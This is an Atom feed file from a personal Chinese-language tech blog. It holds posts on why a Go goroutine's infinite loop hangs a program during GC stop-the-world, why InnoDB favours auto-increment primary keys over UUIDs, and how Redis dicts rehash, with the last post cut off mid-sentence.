-
Notifications
You must be signed in to change notification settings - Fork 0
/
atom.xml
511 lines (307 loc) · 220 KB
/
atom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>xlzd 杂谈</title>
<subtitle>blog of xlzd</subtitle>
<link href="/atom.xml" rel="self"/>
<link href="https://xlzd.me/"/>
<updated>2019-05-14T06:33:49.576Z</updated>
<id>https://xlzd.me/</id>
<author>
<name>xlzd</name>
</author>
<generator uri="http://hexo.io/">Hexo</generator>
<entry>
<title>Golang 里一个有趣的小细节</title>
<link href="https://xlzd.me/2018/09/18/golang-stop-the-world/"/>
<id>https://xlzd.me/2018/09/18/golang-stop-the-world/</id>
<published>2018-09-17T16:43:55.000Z</published>
<updated>2019-05-14T06:33:49.576Z</updated>
<content type="html"><![CDATA[<p>前几天一个小伙伴在公司 slack 问到如下 Golang 代码为什么会卡死(<a href="https://play.golang.org/p/nxo4D832JCo" target="_blank" rel="noopener">Go Playground</a>):</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line"><span class="string">"fmt"</span></span><br><span class="line"><span class="string">"runtime"</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">var</span> i <span class="keyword">byte</span></span><br><span class="line"><span class="keyword">go</span> <span class="function"><span class="keyword">func</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">for</span> i = <span class="number">0</span>; i <= <span class="number">255</span>; i++ {</span><br><span class="line">}</span><br><span class="line">}()</span><br><span class="line">fmt.Println(<span class="string">"Dropping mic"</span>)</span><br><span class="line"><span class="comment">// Yield execution to force executing other goroutines</span></span><br><span class="line">runtime.Gosched()</span><br><span class="line">runtime.GC()</span><br><span class="line">fmt.Println(<span class="string">"Done"</span>)</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>这个问题很有意思,大概涉及到 Golang 中以下三个概念:</p><ol><li>byte 是什么</li><li>goroutine 如何调度</li><li>Golang GC 时会发生什么</li></ol><p>本文尝试简单解释下为什么上面的程序会卡死。</p><p>首先,先看下 main 函数里启动的 goroutine 事实上是什么东西:<br><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> i <span class="keyword">byte</span></span><br><span class="line"><span class="keyword">go</span> <span class="function"><span class="keyword">func</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">for</span> i = <span class="number">0</span>; i <= <span class="number">255</span>; i++ {</span><br><span class="line">}</span><br><span class="line">}()</span><br></pre></td></tr></table></figure></p><p>Golang 中,byte 其实被 alias 到 uint8 上了。所以上面的 for 循环会始终成立,因为 i++ 到 i=255 的时候会溢出,<code>i <= 255</code> 一定成立。也即是, for 循环永远无法退出,所以上面的代码其实可以等价于这样:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">go</span> <span class="function"><span class="keyword">func</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">for</span> {}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>其次,Goroutine 的调度是一个非常复杂的问题,这里并不打算详细介绍完整细节。<br>大概描述一下,目前版本的 Golang 中 goroutine 的调度(<a href="https://docs.google.com/document/d/1TTj4T2JO42uD5ID9e89oa0sLKhJYD0Y_kqxDv3I3XMw/edit" target="_blank" rel="noopener">Scalable Go Scheduler Design Doc</a>)基于 GPM 模型,G 代表 goroutine,M 可以看做真实的资源(OS Threads)。P 是 G-M 的中间层,组织多个 goroutine 跑在同一个 OS Thread 上。大概的模型如下(图偷自 Google 图片搜索):</p><p><img src="https://user-images.githubusercontent.com/5506906/45667496-fdcfde80-bb4b-11e8-9c03-d35ef0897685.png" alt="image"></p><p>如上图可以看到,一个 P 上会挂着多个 G,当一个 G 执行结束时,P 会选择下一个 G 继续执行。而当一个 G 执行太久没有结束,总也要给后面的 G 运行的机会吧。所以,Go scheduler 除了在一个 goroutine 执行结束时会调度后面的 goroutine 执行,还会在正在被执行的 goroutine 发生以下情况时让出当前 goroutine 的执行权,并调度后面的 goroutine 执行:</p><ul><li>IO 操作</li><li>Channel 阻塞</li><li>system call</li><li>运行较长时间</li></ul><p>前三种这里我们不关心,最后一种情况下,如果一个 goroutine 执行时间太长,scheduler 会在其 G 对象上打上一个标志( preempt),当这个 goroutine 内部<strong>发生函数调用的时候</strong>,会先主动检查这个标志,如果为 true 则会让出执行权。(这里说得比较粗略,实际会复杂一些,不过并不是本文重点所以暂不关注细节。)</p><p>回到本文开始时的例子,main 函数里启动的 goroutine 其实是一个没有 IO 阻塞、没有 Channel 阻塞、没有 system call、没有函数调用的死循环。也就是,它无法主动让出自己的执行权,即使已经执行很长时间,scheduler 已经标志了 preempt。</p><p>如上图所示,一旦这个 G ( goroutine ) 拿到执行权,它后面的 G 将无法再被当前 P 调度获得执行权。上面程序为了让这个 G 对象一定拿到执行权,在 main goroutine 中主动执行 <code>runtime.Gosched()</code> 让出了执行权。</p><p>P 的数量由 GOMAXPROCS 设置,默认为机器的 CPU 数量。</p><p>这里又分为两种情况:</p><ol><li>当这个程序跑在单核机器上的时候,P 默认只有一个,所以一旦调度到这个 G 对象就会卡死,因为永远没有机会再调度回 main goroutine 了。</li><li>当这个程序跑在多核机器上的时候,程序到这一步并不会卡死,因为另一个 P 所关联的 G 队列执行完了之后,会通过 Work-Stealing 算法偷取别的 P 对象上的 G,所以 main goroutine 还是有机会被别的 P 调度到。</li></ol><p>可是文章开始时的代码,不论是在单核的机器上,还是在多核的机器上,都会卡死。</p><p>这就涉及到第三个点了:Golang 的 GC。</p><p>Golang 的 GC 本质上是基于<strong>标记-清除</strong>实现的(基于此不断改进过)。<br>见名知意,标记-清除分为两个阶段:</p><ul><li>标记</li><li>清除</li></ul><p>其中,标记阶段是需要 STW( Stop The World )的,也就是会让所有正在运行的 goroutine 停下来。大概源码在<a href="https://github.com/golang/go/blob/release-branch.go1.11/src/runtime/mgc.go#L1316" target="_blank" rel="noopener">这个位置</a>:<br><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">gcStart</span><span class="params">(mode gcMode, trigger gcTrigger)</span></span> {</span><br><span class="line"></span><br><span class="line"><span class="comment">// ......</span></span><br><span class="line">systemstack(stopTheWorldWithSema)</span><br><span class="line"><span class="comment">// ......</span></span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>到这一步,死循环这个 goroutine 由于上面介绍的原因永远无法停下来,但是 main goroutine 阻塞在 GC STW 这里,等待所有 goroutine 停止执行。main goroutine 在等待一个永远不会为它停下的 G,于是,程序卡死了。</p><p>类似的,在设置 GOMAXPROCS 的时候,也需要 STW,所以下面的代码,和本文开始时的代码,卡死的原因是一样一样的(<a href="https://play.golang.org/p/vvuD1smj9RM" target="_blank" rel="noopener">Go Playground</a>):</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line"><span class="string">"fmt"</span></span><br><span class="line"><span class="string">"runtime"</span></span><br><span class="line"><span class="string">"time"</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">forever</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">for</span> {</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">go</span> forever()</span><br><span class="line"></span><br><span class="line">time.Sleep(time.Millisecond) <span class="comment">// 让出执行权</span></span><br><span class="line">runtime.GOMAXPROCS(<span class="number">1926</span>) <span class="comment">// 等待 stw</span></span><br><span class="line">fmt.Println(<span class="string">"Done"</span>) <span class="comment">// 永远执行不到</span></span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>区区几行代码,里面的奥妙真不少呀。</p>]]></content>
<summary type="html">
<p>前几天一个小伙伴在公司 slack 问到如下 Golang 代码为什么会卡死(<a href="https://play.golang.org/p/nxo4D832JCo" target="_blank" rel="noopener">Go Playground</a>):
</summary>
<category term="Golang" scheme="https://xlzd.me/tags/Golang/"/>
</entry>
<entry>
<title>为什么建议 MySQL InnonDB 的表使用递增的主键 ID</title>
<link href="https://xlzd.me/2018/09/14/why-mysql-innodb-need-auto-increment-primary-key/"/>
<id>https://xlzd.me/2018/09/14/why-mysql-innodb-need-auto-increment-primary-key/</id>
<published>2018-09-14T13:33:53.000Z</published>
<updated>2019-05-14T06:33:49.584Z</updated>
<content type="html"><![CDATA[<p>经验较少的程序员在设计数据表的时候,经常会听到 DBA 老鸟建议在表上使用递增的主键 ID,而不是使用 UUID 等方式产生 ID。大体的措辞都是 InnoDB 使用自增的主键更快云云,本文尝试阐述为什么需要这样做。</p><h2 id="聚簇索引"><a href="#聚簇索引" class="headerlink" title="聚簇索引"></a>聚簇索引</h2><p>在 InnoDB 中,每个表都会有一个<strong>聚簇索引</strong>,在定义了主键( primary key )的情况下,主键所在的列会被作为聚簇索引存储。所谓聚簇索引,意思是数据实际上是存储在索引的叶子节点上,「聚簇」的含义就是数据行和相邻的数据紧凑地存储在一起。因为不能(或者不值得)同时把数据行存储在两个不同的位置,所以一个表只能有一个聚簇索引。</p><p>关于 InnoDB 选择哪个列作为聚簇索引存储,大概的优先级为:</p><ol><li>如果定义了主键( primary key ),则使用主键;</li><li>如果没有定义主键,则选择第一个不包含 NULL( NOT NULL )的 UNIQUE KEY;</li><li>如果也没有,则会隐式定义一个主键作为聚簇索引。</li></ol><p>下图展示了聚簇索引中记录(数据)是如何存放的:</p><p><img src="https://user-images.githubusercontent.com/5506906/45551535-d71a5b00-b860-11e8-914b-ff6bba012b17.png" alt="image"></p><p>如上图所示,聚簇索引中,不但存储了索引,还存储了整张表的数据到叶子节点上。可以认为 InnoDB 中,聚簇索引「就是」表。对应的,InnoDB 的其它索引中,叶子节点所存储的,其实是主键的值。存储主键的值而不是数据行的位置,这样的存储方式可以减少当出现数据行移动或者数据页分裂时二级索引的维护工作。</p><h2 id="聚簇与非聚簇表的数据存储方式"><a href="#聚簇与非聚簇表的数据存储方式" class="headerlink" title="聚簇与非聚簇表的数据存储方式"></a>聚簇与非聚簇表的数据存储方式</h2><p>我们假设有如下数据表:</p><p><img src="https://user-images.githubusercontent.com/5506906/45552024-2614c000-b862-11e8-8009-4ec017ee5645.png" alt="image"></p><p>我们假设列 col1 是 primary key,那么,对应的聚簇索引存储结构就会如下:</p><p><img src="https://user-images.githubusercontent.com/5506906/45552432-83f5d780-b863-11e8-987f-03913bcceb9e.png" alt="image"></p><p>(暂时不必关心 TID 和 RP,它们是事务 ID 和回滚指针)如上所示,聚簇索引除了存储 col1 的值之外,还会存储其它列的值(本例的 col2)。<br>如果 col2 设置了普通索引,对应地,col2 的索引存储结构如下:</p><p><img src="https://user-images.githubusercontent.com/5506906/45552536-cd462700-b863-11e8-937d-777ee488ba49.png" alt="image"></p><p>可以看到,对应 B+ 树叶子节点上存储了对应行的主键的值。</p><p>抽象来看,InnoDB 通过如下结构存储主键索引(聚簇索引):</p><p><img src="https://user-images.githubusercontent.com/5506906/45552757-8a388380-b864-11e8-8cf6-ad0c46847e58.png" alt="image"></p><p>InnoDB 通过如下结构存储二级索引:</p><p><img src="https://user-images.githubusercontent.com/5506906/45552771-915f9180-b864-11e8-8b3a-93da00f27aa7.png" alt="image"></p><p>作为参考,MyISAM(另一个 MySQL 存储引擎)是这样存储主键索引和二级索引的:</p><p><img src="https://user-images.githubusercontent.com/5506906/45552785-97ee0900-b864-11e8-8471-3bee5dd3a93e.png" alt="image"></p><h2 id="InnoDB-表中按主键顺序插入"><a href="#InnoDB-表中按主键顺序插入" class="headerlink" title="InnoDB 表中按主键顺序插入"></a>InnoDB 表中按主键顺序插入</h2><p>一般来讲,使用一个业务无关的自增( AUTO_INCREMENT )ID,可以保证数据在插入时会被按顺序写入。假设我们使用 UUID 作为聚簇索引,在插入数据的时候,聚簇索引所被插入的位置将变得完全随机。大量的随机插入会导致页分裂和碎片非常多。</p><p>下图展示了数据插入有序递增时,聚簇索引会如何存储插入的数据行:<br><img src="https://user-images.githubusercontent.com/5506906/45553171-c1f3fb00-b865-11e8-8175-2bb1a4562003.png" alt="image"></p><p>可以看到,因为主键是有序的,InnoDB 把每一条记录都存储在上一条记录的后面。当当前页即将写满时(之所以是即将而不是已经,是因为 InnoDB 会预留一点空间用于以后修改数据,默认预留页的 1/16 大小),下一条记录被插入时,将会写入到新的页中去。所有被插入的数据,都将有序地放到聚簇索引最后的位置上去。</p><p>对应地,如果使用 UUID 作为主键索引,InnoDB 将完全随机地将数据插入到聚簇索引对应的位置上去:</p><p><img src="https://user-images.githubusercontent.com/5506906/45553481-97ef0880-b866-11e8-88e5-441043983a2e.png" alt="image"></p><p>如上,因为新插入的行的主键不一定比之前插入的大(由于是 UUID,将会非常随机),所以 InnoDB 将无法简单地总是把新行插入到索引的最后,而是需要根据主键 ID 的值为它寻找合适的索引位置,并为其分配空间。使用 UUID 作为聚簇索引,有以下缺点:</p><ul><li>写入的目标页可能已经写入到磁盘而不只是存在于内存中,又或者目标页还没有被加载到内存中,InnoDB 在插入前需要先找到并从磁盘中读取目标页到内存中去,这会产生大量的磁盘随机 IO。</li><li>因为写入是乱序的,InnoDB 需要频繁地做页分裂操作,一遍为新的行分配空间。页分裂需要移动大量数据。</li><li>有序频繁的页分裂,页会变得稀疏并被不规则地填充,所以最终数据会有碎片。</li></ul><p>所以,在使用 InnoDB 时应该尽可能使用单调递增的主键 ID 顺序插入数据。单调递增的主键 ID 并不只有 AUTO INCREMENT 一种方式,比如一些分布式发号器算法,也能产生递增的 ID 序列。</p><h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>简述了为什么应该使用自增的 ID 而不是 UUID 作为 InnoDB 表的主键 ID。</p><p><em>注:本文截图摘自《高性能 MySQL》</em></p>]]></content>
<summary type="html">
<p>经验较少的程序员在设计数据表的时候,经常会听到 DBA 老鸟建议在表上使用递增的主键 ID,而不是使用 UUID 等方式产生 ID。大体的措辞都是 InnoDB 使用自增的主键更快云云,本文尝试阐述为什么需要这样做。</p>
<h2 id="聚簇索引"><a href="#
</summary>
<category term="MySQL" scheme="https://xlzd.me/tags/MySQL/"/>
</entry>
<entry>
<title>Redis dict rehash</title>
<link href="https://xlzd.me/2018/09/04/redis-dict-rehash/"/>
<id>https://xlzd.me/2018/09/04/redis-dict-rehash/</id>
<published>2018-09-04T12:06:29.000Z</published>
<updated>2019-05-14T06:33:49.582Z</updated>
<content type="html"><![CDATA[<p>字典(<code>dict</code>)是 Redis 实现中非常常用的数据结构,比如用来作为 set 和 hash 的底层实现之一,dict 也是 Redis 数据库中 redisDb 用来存储所有数据的基本格式。</p><h2 id="dict-的实现"><a href="#dict-的实现" class="headerlink" title="dict 的实现"></a>dict 的实现</h2><h3 id="dictht-hash-table-amp-dictEntry"><a href="#dictht-hash-table-amp-dictEntry" class="headerlink" title="dictht(hash table) & dictEntry"></a>dictht(hash table) & dictEntry</h3><p>Redis 中 dict 结构其实封装了 hash table( Redis 中叫做 dictht ),如下是 Redis4.0 中,<a href="https://github.com/antirez/redis/blob/4.0/src/dict.h#L69-74" target="_blank" rel="noopener">dictht 的定义</a>:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dictht</span> {</span></span><br><span class="line"> dictEntry **table; <span class="comment">// hash table 实际存储的位置 </span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> size; <span class="comment">// table 的大小</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> sizemask;</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> used; <span class="comment">// 已经使用的长度</span></span><br><span class="line">} dictht;</span><br></pre></td></tr></table></figure><p>如上,table 属性指向一个 <code>dictEntry</code> 指针数组的开始位置,(其实就是 <code>dictEntry</code> 指针数组)用来存储每一组键值对。size 则记录 table 的长度,used 用来记录已经存储的节点数量。</p><p>如下是 <a href="https://github.com/antirez/redis/blob/4.0/src/dict.h#L47-56" target="_blank" rel="noopener">dictEntry 的定义</a>:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dictEntry</span> {</span></span><br><span class="line"> <span class="keyword">void</span> *key;</span><br><span class="line"> <span class="keyword">union</span> {</span><br><span class="line"> <span class="keyword">void</span> *val;</span><br><span class="line"> <span class="keyword">uint64_t</span> u64;</span><br><span class="line"> <span class="keyword">int64_t</span> s64;</span><br><span class="line"> <span class="keyword">double</span> d;</span><br><span class="line"> } v;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">dictEntry</span> *<span class="title">next</span>;</span></span><br><span class="line">} dictEntry;</span><br></pre></td></tr></table></figure><p>如上,key 则是一个键值对的键,v 是对应的值。每个 dictEntry 除了存储键值之外,还有一个 next 指针,用来指向 hash 相同时的下一个节点,以解决 hash 冲突问题。</p><p>如下图,假如 k1/k2 对应的 hash 相同,则会通过 next 指针连接起来:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">+----------+</span><br><span class="line">| dictht |</span><br><span class="line">+----------+ +----------+</span><br><span class="line">| table +--->| dictEntry|</span><br><span class="line">| | +----------+</span><br><span class="line">| size | | 0 +->NULL +---------+ +---------+</span><br><span class="line">| | +----------+ | entry | next | entry | next</span><br><span class="line">| sizemask| | 1 +------->+---------+----->+---------+----->NULL</span><br><span class="line">| | +----------+ | k1 | v1 | | k2 | v2 |</span><br><span class="line">| used | | 2 +->NULL +---------+ +---------+</span><br><span class="line">+----------+ +----------+</span><br><span class="line"> | 3 +->NULL</span><br><span class="line"> +----------+</span><br></pre></td></tr></table></figure><h3 id="dict"><a href="#dict" class="headerlink" title="dict"></a>dict</h3><p>Redis4.0 中 <a href="https://github.com/antirez/redis/blob/4.0/src/dict.h#L76-82" target="_blank" rel="noopener">dict 的定义</a>如下:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dictType</span> {</span></span><br><span class="line"> <span class="comment">// 计算哈希值</span></span><br><span class="line"> <span class="keyword">uint64_t</span> (*hashFunction)(<span class="keyword">const</span> <span class="keyword">void</span> *key);</span><br><span class="line"> <span class="comment">// 复制 key</span></span><br><span class="line"> <span class="keyword">void</span> *(*keyDup)(<span class="keyword">void</span> *privdata, <span class="keyword">const</span> <span class="keyword">void</span> *key);</span><br><span class="line"> <span class="comment">// 复制 value</span></span><br><span class="line"> <span class="keyword">void</span> *(*valDup)(<span class="keyword">void</span> *privdata, <span class="keyword">const</span> <span class="keyword">void</span> *obj);</span><br><span class="line"> <span class="comment">// 比较 key</span></span><br><span class="line"> <span class="keyword">int</span> (*keyCompare)(<span class="keyword">void</span> *privdata, <span class="keyword">const</span> <span class="keyword">void</span> *key1, <span class="keyword">const</span> <span class="keyword">void</span> *key2);</span><br><span class="line"> <span class="comment">// 销毁 key</span></span><br><span class="line"> <span class="keyword">void</span> (*keyDestructor)(<span class="keyword">void</span> *privdata, <span class="keyword">void</span> *key);</span><br><span class="line"> <span class="comment">// 销毁 value</span></span><br><span class="line"> <span class="keyword">void</span> (*valDestructor)(<span class="keyword">void</span> *privdata, <span class="keyword">void</span> *obj);</span><br><span class="line">} dictType;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dict</span> {</span></span><br><span class="line"> dictType *type;</span><br><span class="line"> <span class="keyword">void</span> *privdata;</span><br><span class="line"> dictht ht[<span class="number">2</span>];</span><br><span class="line"> <span class="keyword">long</span> rehashidx; <span class="comment">/* rehashing not in progress if rehashidx == -1 */</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> iterators; <span class="comment">/* number of iterators currently running */</span></span><br><span class="line">} dict;</span><br></pre></td></tr></table></figure><p>先看一下 dictType,由于 dictEntry 中的 key 是 <code>void*</code>,v 也可以是 <code>void*</code>,所以需要某种方式来操作具体的键和值。dictType 就定义了一组函数指针,dict 对象的 type 指针关联本 dict 对应的 key-value pair 实现的 dictType,以实现具体类型的计算哈希、复制键值、比较和销毁键值等操作。dict 通过这样的方式实现了多态。</p><p>dict 结构体中,prevdata 保存了需要传给 dictType 里的函数的特定参数(dictType 中各个函数签名中的 prevdata 指针)。</p><p>ht 是包含两个 dictht 对象的数组,ht[0] 存储数据,ht[1] 在 rehash 的时候会用到,下面就会提到。</p><p>rehashidx 记录 rehash 进度,本文后面会详细介绍。</p><p>在没有发生 rehash 的时候,ht[1] 是一个空的 dictht。</p><h2 id="hash-冲突"><a href="#hash-冲突" class="headerlink" title="hash 冲突"></a>hash 冲突</h2><p>所谓 hash table,本质是将 hash(key) 映射到自己的 table 数组中去。<br>对于一个 dict 对象,一个 dictEntry 经过下面的计算即可知道需要被映射到哪个位置:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hash = dict->type->hashFunction(dictEntry->key);</span><br><span class="line">position = hash & dict->ht[<span class="number">0</span>].sizemask;</span><br></pre></td></tr></table></figure></p><p>想象这样的情况,如果两个 key 的哈希值相同,或者哈希值 & sizemask 相同,即两个不同的 key 被映射到 dictht.table 的同一个位置,也就是发生了 hash 冲突。</p><p>如上 dictEntry 结构中的 next 指针,Redis 通过这个指针将 hash 冲突的 dictEntry 连接到一起,以解决冲突。</p><p>由于 dictEntry 只有 next 指针,所以处于性能考虑,当 dictht 遇到 hash 冲突时,新的节点总是会被添加到这个链表的表头节点,也就是只需要 O(1) 时间复杂度。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">before: 包含 k1-v1 的 dictht:</span><br><span class="line">+----------+</span><br><span class="line">| dictht |</span><br><span class="line">+----------+ +----------+</span><br><span class="line">| table +--->| dictEntry|</span><br><span class="line">| | +----------+</span><br><span class="line">| size | | 0 +->NULL +---------+ </span><br><span class="line">| | +----------+ | entry | </span><br><span class="line">| sizemask| | 1 +------->+---------+ </span><br><span class="line">| | +----------+ | k1 | v1 | </span><br><span class="line">| used | | 2 +->NULL +---------+ </span><br><span class="line">+----------+ +----------+</span><br><span class="line"> | 3 +->NULL</span><br><span class="line"> +----------+</span><br><span class="line"></span><br><span class="line">after: 当 k2 与 k1 的 hash 冲突时,k2 会被插入到链表表头节点:</span><br><span class="line">+----------+</span><br><span class="line">| dictht |</span><br><span class="line">+----------+ +----------+</span><br><span class="line">| table +--->| dictEntry|</span><br><span class="line">| | +----------+</span><br><span class="line">| size | | 0 +->NULL +---------+ +---------+</span><br><span class="line">| | +----------+ | entry | next | entry | next</span><br><span class="line">| sizemask| | 1 +------->+---------+----->+---------+----->NULL</span><br><span class="line">| | +----------+ | k2 | v2 | | k1 | v1 |</span><br><span class="line">| used | | 2 +->NULL +---------+ +---------+</span><br><span class="line">+----------+ +----------+</span><br><span class="line"> | 3 +->NULL</span><br><span class="line"> +----------+</span><br></pre></td></tr></table></figure><h2 id="rehash-过程"><a href="#rehash-过程" class="headerlink" title="rehash 过程"></a>rehash 过程</h2><p>当 dictEntry 被不断插入到 dictht 中或不断被删除时,dictht 对象的 table size 对于当前存储元素个数来讲可能太小或者太大。<br>衡量所谓「太大」和「太小」的标准,叫做<strong>负载因子( load factor )</strong>,这个值的计算规则为:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">loadFactor = dictht.used / dictht.size</span><br></pre></td></tr></table></figure><p>比如对于上面的例子,负载因子就是 2 / 4 = 0.5。</p><p>当:</p><ol><li>服务器执行 BGSAVE/BGREWRITEAOF 命令且负载因子大于 5 时,Redis 会对 dictht 扩容;</li><li>服务器没有执行 BGSAVE/BGREWRITEAOF 命令且负载因子大于 1 时,Redis 会对 dictht 扩容;</li><li>负载因子小于 0.1 时,Redis 会对 dictht 